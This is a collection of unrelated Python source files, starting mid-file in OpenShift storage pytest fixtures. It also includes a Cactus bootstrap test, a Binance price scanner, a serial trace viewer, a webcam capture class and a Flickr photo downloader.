size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List of OCS instances of kind VolumeSnapshot which
have to be restored to new PVCs
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List of restored PVC object
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snap_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects OCS logs after tier execution, which allows inspecting
the cluster's status after the run regardless of the execution result.
"""
def finalizer():
"""
Tracking both logs separately reduces the chance of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready noobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# Prior to 4.6 we configured the endpoint count directly on the noobaa CR.
if float(config.ENV_DATA["ocs_version"]) < 4.6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
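# From OCS 4.6 onward the endpoint counts are configured under
# spec.multiCloudGateway.endpoints of the StorageCluster resource,
# which is what the merge patches below modify.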
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
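# A minimal usage sketch for pvc_clone_factory (illustrative only - the test
# name and the pvc_factory usage are hypothetical):
#
#   def test_pvc_clone(pvc_factory, pvc_clone_factory):
#       parent_pvc = pvc_factory()
#       clone_pvc = pvc_clone_factory(pvc_obj=parent_pvc)
#       # clone_pvc keeps a reference to its parent via clone_pvc.parent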
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if hasattr(request.node.config, "py_test_service"):
rp_service = request.node.config.py_test_service
if not hasattr(rp_service.RP, "rp_client"):
request.config._metadata[
"RP Launch URL:"
] = "Problem with RP, launch URL is not available!"
return
launch_id = rp_service.RP.rp_client.launch_id
project = rp_service.RP.rp_client.project
endpoint = rp_service.RP.rp_client.endpoint
launch_url = f"{endpoint}/ui/#{project}/launches/all/{launch_id}/{launch_id}"
config.REPORTING["rp_launch_url"] = launch_url
config.REPORTING["rp_launch_id"] = launch_id
config.REPORTING["rp_endpoint"] = endpoint
config.REPORTING["rp_project"] = project
request.config._metadata["RP Launch URL:"] = launch_url
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates a clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List of PVC objects from which clones have to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List PVC instance
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clones of the postgres PVCs
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
# Attach a new pgsql pod restored pvcs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
Create an in-cluster elastic-search deployment for benchmark-operator tests.
The name 'es' is used as a shortcut for elastic-search for simplicity.
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="function")
def setup_ui(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load the cluster_info.json file if it exists (on
clusters installed via Flexy) and applies the information to the config
object (for example, information related to disconnected clusters)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def ripsaw(request):
# Create benchmark Operator (formerly ripsaw)
ripsaw = RipSaw()
def teardown():
ripsaw.cleanup()
time.sleep(10)
request.addfinalizer(teardown)
return ripsaw
|
main_queue_test.py
|
import multiprocessing
import keyboard
def getData(queue_raw):
#while True:
for num in range(1000):
queue_raw.put(num)
print("getData: put "+ str(num)+" in queue_raw")
def calcFeatures(queue_raw, queue_features):
while not queue_raw.empty():
data = queue_raw.get()
queue_features.put(data**2)
print("calcFeatures: put "+ str(data**2)+" in queue_features")
def sendFeatures(queue_features):
while True:
while not queue_features.empty():
feature = queue_features.get()
print("sendFeatures: put "+ str(feature)+" out")
if keyboard.read_key() == "p":
#print("You pressed p")
break
if __name__ == "__main__":
queue_raw = multiprocessing.Queue()
queue_features = multiprocessing.Queue()
processes = [
multiprocessing.Process(target=getData, args=(queue_raw,)),
multiprocessing.Process(target=calcFeatures, args=(queue_raw, queue_features,)),
multiprocessing.Process(target=sendFeatures, args=(queue_features,))
]
for p in processes:
p.start()
for p in processes:
p.join()
|
test_bootstrap.py
|
#coding:utf-8
import os
import shutil
import tarfile
import tempfile
import unittest
import zipfile
import threading
import random
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from cactus.bootstrap import bootstrap
from cactus.tests import BaseTestCase
from cactus.utils.filesystem import fileList
def ArchiveServerHandlerFactory(archive_path):
class ArchiveHandler(SimpleHTTPRequestHandler):
def do_GET(self):
"""
Reply with the archive.
"""
self.send_response(200)
self.end_headers()
with open(archive_path, 'rb') as f:
self.copyfile(f, self.wfile)
def log_request(self, code='-', size='-'):
"""
Discard log requests to clear up test output.
"""
return
return ArchiveHandler
class TestFolderBootstrap(BaseTestCase):
def test_bootstrap(self):
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList("cactus/tests/data/skeleton", relative=True)),
)
class TestCactusPackageBootstrap(BaseTestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.path = os.path.join(self.test_dir, 'test')
self.clear_django_settings()
bootstrap(self.path)
def test_bootstrap(self):
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList("cactus/skeleton", relative=True)),
)
class BaseTestArchiveBootstrap(object):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.path = os.path.join(self.test_dir, 'test')
self.skeleton_path = "cactus/skeleton"
self.archive_path = os.path.join(self.test_dir, "archive")
with open(self.archive_path, "wb") as f:
self.make_archive(f)
def make_archive(self, f):
raise NotImplementedError()
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_file(self):
# Test
bootstrap(self.path, self.archive_path)
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList(self.skeleton_path, relative=True)),
)
def test_url(self):
global ServerPort
archive_path = self.archive_path
port = random.choice(xrange(7000, 10000))
server_address = ("127.0.0.1", port)
httpd = HTTPServer(server_address, ArchiveServerHandlerFactory(archive_path))
t = threading.Thread(target=httpd.serve_forever)
t.start()
bootstrap(self.path, "http://127.0.0.1:%s" % port)
httpd.shutdown()
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList(self.skeleton_path, relative=True)),
)
class ZIPTestArchiveBootstrap(BaseTestArchiveBootstrap, unittest.TestCase):
"""
Test ZIP archive support
"""
def make_archive(self, f):
archive = zipfile.ZipFile(f, mode="w")
for resource in fileList(self.skeleton_path, relative=True):
archive.write(os.path.join(self.skeleton_path, resource), resource)
archive.close()
class TARTestArchiveBootstrap(BaseTestArchiveBootstrap, unittest.TestCase):
"""
Test TAR archive support
"""
def make_archive(self, f):
archive = tarfile.open(f.name, fileobj=f, mode="w")
for resource in fileList(self.skeleton_path, relative=True):
archive.add(os.path.join(self.skeleton_path, resource), resource)
archive.close()
|
ocs_start_of_night_process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import multiprocessing
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(multiprocessing.current_process().name))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do start_of_night stuff
if entobj:
# enter control
entobj.logger.info('{0:s}.entercontrol()'.format(entity))
entobj.entercontrol()
# start
entobj.logger.info("{0:s}.start('Normal')".format(entity))
entobj.start('Normal')
# enable
entobj.logger.info('{0:s}.enable()'.format(entity))
entobj.enable()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# created shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = multiprocessing.Process(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s}.exitcode: {1:s}'.format(j.name, str(j.exitcode)))
|
app.py
|
'''
Brick's Scanner
Version: 0.02
Date: 6/6/2021
www.brick.technology
www.coinlab.pro
Notes:
1. This is a quick fun project I made last night. Use this as a launch pad to build your own, more effective scanner.
2. You can add any symbol on binance to the 'coins' list and it will be added to the scanner
3. The scanner looks for a price increase over the last second.
-> If the scanner detects an increase, 'recording' is turned on
-> Currently the code will track price increases over 20s
-> Console prints occur only if the price has kept rising over the past 5-10s
'''
import json, time
import datetime as dt
from websocket import create_connection
from colorama import init, Fore
from threading import Thread
print('----------------------------------- Bricks\'s Scanner ------------------------------------')
print('**************** Updates will only be displayed when conditions are met *****************\n')
print('--------------------------------------- Scanning ----------------------------------------')
# Subscribe to binance /@miniTicker websocket:
coins = ['dogeusdt','btcusdt','ethusdt','linkusdt','uniusdt','algousdt','maticusdt','compusdt','lunausdt','dodousdt','ankrusdt','milusdt','gtcusdt','ampusdt','aaveusdt','adausdt','cakeusdt','bnbusdt','crvusdt','xlmusdt','sushiusdt','grtusdt']
# Parse websocket data into two values: coin, close_price
# Each response is a 'bar'. I chose to use 'c' the value for bar close
def parse_ws(result):
msg = json.loads(result)
return str(msg['s']),float(msg['c'])
# Class assigned to each coin after threading.
class coinData():
def __init__(self,pair,now):
self._coin = pair
self._price = 1
self._now = now
self._record = False
self._record_start_time = 0
self._record_start_price = 0
self._1s = 1
self._5s = 1
self._5s_status = True
self._10s = 1
self._10s_status = True
self._15s = 1
self._15s_status = True
self._20s = 1
self._20s_status = True
# Function for thread processes
def coin_thread(c:str):
ws = create_connection('wss://stream.binance.com:9443/ws/'+c+'@miniTicker')
start = time.time()
coin = coinData(c,start)
# Create infinite loop
while True:
try:
coin._now = time.time()
result = ws.recv()
coin._coin,coin._price = parse_ws(result)
# If the coin's class property '_record' is set to 'False', check the percentage change over the last second
# When the price increases over 1s, switch '_record' to 'True'
if coin._record == False:
if coin._price > coin._1s:
print(Fore.WHITE+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 1s Gain '+ str(round(((coin._price - coin._1s)/coin._price)*100,4))+'%')
coin._record_start_time = coin._now
coin._record = True
coin._record_start_price = coin._price
coin._1s = coin._price
else:
coin._1s = coin._price
# When '_record' is set to 'True', calculate the length of time since '_record_start_time' as long as the price is increasing.
# '_record_start_time' is the time the recording of price changes starts
# This gets reset to 0 after the price stops moving up (or after 20s because I have only built support for 20s so far)
else:
if coin._price > coin._record_start_price:
if coin._price > coin._record_start_price and coin._now-coin._record_start_time >= 5 and coin._5s_status == True:
print(Fore.LIGHTCYAN_EX+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 5s Gain '+ str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._5s = coin._price
coin._5s_status = False
elif coin._price > coin._5s and coin._now-coin._record_start_time >= 10 and coin._10s_status == True:
print(Fore.GREEN+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 10s Gain: '+str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._10s = coin._price
coin._10s_status = False
elif coin._price > coin._10s and coin._now-coin._record_start_time >= 15 and coin._15s_status == True:
print(Fore.LIGHTMAGENTA_EX+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 15s Gain: '+str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._15s = coin._price
coin._15s_status = False
elif coin._price > coin._15s and coin._now-coin._record_start_time >= 20 and coin._20s_status == True:
print(Fore.RED+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 20s Gain: '+str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._20s = coin._price
coin._20s_status = False
elif coin._price > coin._20s and coin._now-coin._record_start_time >= 20 and coin._20s_status == False:
pass
else:
pass
else:
coin._record = False
coin._1s = coin._price
coin._5s, coin._10s, coin._15s, coin._20s = 0,0,0,0
coin._1s_status, coin._5s_status, coin._10s_status, coin._15s_status, coin._20s_status = True, True, True, True, True
coin._record_start_time = 0
# Handles exceptions from the main while loop
except Exception as e:
print(e)
break
# Crank it up
if __name__ == "__main__":
price_list = []
first_run_flag = 0
init()
[Thread(target=coin_thread, args=(str(x),),).start() for x in coins]
|
tracer.py
|
from sys import argv, stderr
from time import sleep
from json import dumps
from bottle import post, get, request, run
from serial import Serial, SerialException
from pathlib import Path
from threading import Thread
from mekpie.util import file_as_str
from mekpie.cli import panic
from mekpie.cache import project_cache
from .decoder import init_decoder, decode_trace
PORT = 3000
BAUD = 115200
POLL_DELAY = 0.1
MAX_TRACES = 200
trace_log = []
trace_index = 0
@get('/')
def index():
return file_as_str(Path(__file__).parent / 'index.html')
@get('/reset')
def reset():
global trace_index
trace_index = 0
@get('/data')
def data():
global trace_index
i = trace_index
l = len(trace_log)
if i < l:
trace_index = l
return dumps(trace_log[i:l])
else:
return dumps([])
def main(args):
global MAX_TRACES
MAX_TRACES = args.max
if (args.noweb):
trace_listener(True)
else:
thread = Thread(target=trace_listener)
thread.start()
run(host='localhost', port=args.port, debug=args.debug)
thread.join()
def trace_listener(nolog=False):
with connect() as serial:
try:
ti = trace_iter(serial, nolog)
print('[\n ', end='', flush=True)
first_trace = next(ti)
print(dumps(first_trace), end='', flush=True)
for trace in ti:
print(',\n ' + dumps(trace), end='', flush=True)
except KeyboardInterrupt:
pass
finally:
print('\n]')
serial.read_all()
def connect():
port = get_hardware_port()
try:
serial = Serial(port, BAUD, timeout=1)
print(f'Connected to serial port - {port}', file=stderr)
return serial
except SerialException as ex:
panic(ex)
def get_hardware_port():
with project_cache() as cache:
port_key = None
for key in cache.keys():
if key.endswith('cc_avr_gcc.py:config_port'):
port_key = key
if port_key:
return cache[port_key]
else:
panic('Could not find port! Are you sure you ran `mekpie run`?')
def trace_iter(serial, nolog):
init_decoder(serial.read(1))
trace_count = 0
while True:
trace = decode_trace(serial)
if trace:
if not nolog:
trace_count += 1
trace_log.append(trace)
yield trace
if trace.name == 'Debug_Message':
print(trace.message, end='', file=stderr, flush=True)
if trace.name == 'Mark_Halt' or trace_count > MAX_TRACES:
print('\nDone.', file=stderr, flush=True)
return
else:
sleep(POLL_DELAY)
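# A minimal usage sketch (illustrative only - the argument object below is a
# hypothetical stand-in for the parsed CLI args that main() expects):
#
#   from types import SimpleNamespace
#   main(SimpleNamespace(max=200, noweb=False, port=PORT, debug=False))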
|
webcam.py
|
"""Raspberry Pi Face Recognition Treasure Box
Webcam OpenCV Camera Capture Device
Copyright 2013 Tony DiCola
Webcam device capture class using OpenCV. This class allows you to capture a
single image from the webcam, as if it were a snapshot camera.
This isn't used by the treasure box code out of the box, but is useful to have
if running the code on a PC where only a webcam is available. The interface is
the same as the picam.py capture class so it can be used in the box.py code
without any changes.
"""
import threading
import time
import cv2
# Rate at which the webcam will be polled for new images.
CAPTURE_HZ = 30.0
class OpenCVCapture(object):
def __init__(self, device_id=0):
"""Create an OpenCV capture object associated with the provided webcam
device ID.
"""
# Open the camera.
self._camera = cv2.VideoCapture(device_id)
if not self._camera.isOpened():
self._camera.open()
# Start a thread to continuously capture frames.
# This must be done because different layers of buffering in the webcam
# and OS drivers will cause you to retrieve old frames if they aren't
# continuously read.
self._capture_frame = None
# Use a lock to prevent concurrent access to the camera.
self._capture_lock = threading.Lock()
self._capture_thread = threading.Thread(target=self._grab_frames)
self._capture_thread.daemon = True
self._capture_thread.start()
def _grab_frames(self):
while True:
retval, frame = self._camera.read()
with self._capture_lock:
self._capture_frame = None
if retval:
self._capture_frame = frame
time.sleep(1.0 / CAPTURE_HZ)
def read(self):
"""Read a single frame from the camera and return the data as an OpenCV
image (which is a numpy array).
"""
frame = None
with self._capture_lock:
frame = self._capture_frame
# If there are problems, keep retrying until an image can be read.
while frame is None:
time.sleep(0)
with self._capture_lock:
frame = self._capture_frame
# Return the capture image data.
return frame
def stop(self):
print "Terminating..."
|
firs.py
|
import sys
import time
import json
import os
import glob
from pprint import pprint
import threading
import timeit
import times
import requests
import flickr_api
config = json.load(open('./config.json.default'))
TAG = 'philMeta'
API_KEY = config['flickr_api_key']
API_SECRET = config['flickr_api_secret']
REST_ENDPOINT = 'https://api.flickr.com/services/rest/'
SEARCHES_DIR = './search'
IMG_URL = 'http://farm%s.staticflickr.com/%s/%s_%s_z.jpg'
IMG_FNAME = './images/%s/%s-%s.jpg' # query/id-query.jpg
IMG_URL_S = 'http://farm%s.staticflickr.com/%s/%s_%s_q.jpg'
IMG_FNAME_S = './images/%s/%s_square-%s.jpg' # query/id-query.jpg
IMG_DIR = './images/%s' # query
DATA_DIR = './data'
DATA_FNAME = './data/%s.json' # query
NOW = times.now()
TZ = 'America/New_York'
YMD = times.format(NOW, TZ, fmt='%Y-%m-%d')
flickr_api.set_keys(api_key=API_KEY, api_secret=API_SECRET)
def unjsonpify(jsonp):
return jsonp[14:-1] # totally hacky strip off jsonp func
def get_photo_info(photo):
params = {'api_key': API_KEY,
'photo_id': photo['id'],
'secret': photo['secret'],
'method': 'flickr.photos.getInfo',
'format': 'json'}
response = requests.get(REST_ENDPOINT, params=params)
time.sleep(0.5)
return json.loads(unjsonpify(response.text))
def save_image(url, fname):
r = requests.get(url, stream=True)
with open(fname, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
f.write(chunk)
return True
return False
def download_search(results):
t = threading.currentThread()
start = timeit.timeit()
meta = results[TAG]
photos_data = []
if not os.path.isdir(DATA_DIR):
os.makedirs(DATA_DIR)
if not os.path.isdir(IMG_DIR % meta['query']):
os.makedirs(IMG_DIR % meta['query'])
for i, photo in enumerate(results['photos']['photo']):
sys.stdout.write('\rdownloading photo %d/%d (%s)\n' %
(i + 1,
len(results['photos']['photo']),
meta['query']) )
sys.stdout.flush()
info = get_photo_info(photo)
photos_data.append(info['photo'])
img_url = IMG_URL % (photo['farm'],
photo['server'],
photo['id'],
photo['secret'])
img_url_s = IMG_URL_S % (photo['farm'],
photo['server'],
photo['id'],
photo['secret'])
img_fname = IMG_FNAME % (meta['query'], photo['id'], meta['query'])
img_fname_s = IMG_FNAME_S % (meta['query'], photo['id'], meta['query'])
save_image(img_url, img_fname)
save_image(img_url_s, img_fname_s)
end = timeit.timeit()
print end - start
with open(DATA_FNAME % meta['query'], 'w') as f:
json.dump(photos_data, f)
def download_searches(filenames):
for fname in filenames:
with open(fname) as f:
t = threading.Thread(target=download_search, args=(json.load(f),))
t.start()
print('done')
def search(query='pain'):
if not os.path.isdir(SEARCHES_DIR):
os.makedirs(SEARCHES_DIR)
params = {'api_key': API_KEY,
'safe_search': '1', # safest
'media': 'photos', # just photos
'content_type': '1', # just photos
'privacy_filter': '1', # public photos
'license': '1,2,4,5', # see README.md
'per_page': '10', # max=500
'sort': 'relevance',
'method': 'flickr.photos.search',
'format': 'json'}
query_dict = {'text': query}
clean_query = query.replace(' ', '-')
fname = './search/search.%s.%s.json' % (clean_query, YMD)
response = requests.get(REST_ENDPOINT,
params=dict(params, **query_dict))
with open(fname, 'w') as f:
data = json.loads(unjsonpify(response.text))
data[TAG] = {}
data[TAG]['query'] = clean_query
data[TAG]['when'] = YMD
f.write(json.dumps(data))
def keywords_search(args, keywords):
for i, keyword in enumerate(keywords):
sys.stdout.write('\rrunning keyword search... %d/%d (%s)' %
(i + 1, len(keywords), keyword))
sys.stdout.flush()
search(keyword)
time.sleep(1)
print('\ndone')
if __name__ == '__main__':
import argparse
# populate and parse command line options
desc = 'Grab photos from Flickr.'
parser = argparse.ArgumentParser(description=desc)
#parser.add_argument('infile', nargs='?', default=sys.stdin,
# type=argparse.FileType('rU'),
# help='input file (.csv)')
parser.add_argument('-s', '--search', dest='search', action='store_true')
parser.add_argument('-d', '--download', dest='download',
action='store_true')
args = parser.parse_args()
if args.search:
keywords = []
with open('keywords.txt') as f:
keywords = [e.strip() for e in f.readlines()]
keywords_search(args, keywords)
elif args.download:
searches = glob.glob('./search/search.*.json')
download_searches(searches)
else:
pprint(config)
        parser.print_help()
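# Example invocations (illustrative; the script filename is hypothetical and
# --search expects a keywords.txt file with one query per line):
#   python flickr_grab.py --search      # run flickr.photos.search for each keyword
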